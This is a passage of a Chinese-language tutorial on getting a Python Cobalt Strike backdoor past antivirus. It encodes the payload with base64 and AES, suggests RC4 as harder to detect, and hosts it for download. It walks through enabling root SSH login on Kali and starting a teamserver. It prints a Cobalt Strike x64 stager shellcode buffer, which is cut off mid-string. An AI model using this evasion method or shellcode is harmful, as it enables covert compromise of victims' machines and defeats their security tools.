Python反序列化免杀上线CS：两次编码绕过

环境

Windows：win10
kali：linux-2022.2

1、整体过程

本次免杀通过cs生成python后门—将payloadbase64加密—放入服务器下【网上方便被人下载】。
为了避免杀死，我们进行了两次编码

编码base64编码 =》aes 加密 =》base64编码 加密1次 解密1次
【解密之前要进行解码】 =》得到base64编码 aes解密【建议使用rc4，因为ase加密有名容易被发现】

2、环境CobaltStrike准备

1、kali安装CobaltStrike

将CobaltStrike包上传至kali，但是要注意kali是默认拒绝了ssh的密码登录。如此就无法上传文件
如果当弹出服务拒绝了就要去/etc/ssh/sshd_config文档修改。
参考的问题解决博客

vim /etc/ssh/sshd_config
1

把文档的PermitRootLogin行注释掉，后面添加PermitRootLogin yes

上传包

并且进入CobaltStrike_4.0目录，为"agscript"、“c2lint”、"peclone"和"teamserver"文件赋予执行权限。

#进入cs目录，这里我改了文件名原资源包不是这个文件名
cd cobaltstrike4.0/
#查看
ls -l
#赋予权限
chmod a+x agscript
chmod a+x c2lint
chmod a+x peclone
chmod a+x teamserver

1
2
3
4
5
6
7
8
9
10

然后kali连接并且监听。

./teamserver 192.168.171.152 kali
1

2、Windows启动cs连接kali

HOST为kali的IP地址
Port：为./teamserver语句输入后给出的端口
user：随便输入
Password：为./teamserver语句输入的密码即我给的kali

3、使用cs生成payload

使用cs生成payload


查看生产的编码

# length: 894 bytes
buf = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x27\x23\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x70\x51\x56\x46\x00\x12\x50\x39\xd1\xa5\x3f\x0b\xd0\x98\x82\xb0\x08\xa2\xcc\x9b\x2b\xc5\x7a\xc7\xb4\x29\x29\x2d\xc3\xa6\xe6\x81\xd1\xa0\xc8\x9b\x1e\x9d\x00\x03\x02\x8b\x7a\xd1\x09\xe2\x21\xae\xca\xb8\x8d\x2e\x3c\xe0\xaf\xc9\xed\xce\xd9\x83\x7f\x42\xbd\xe8\xbc\x69\x58\x05\x2b\x38\xfe\x8b\x35\x86\x9a\xb8\x63\x55\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\
1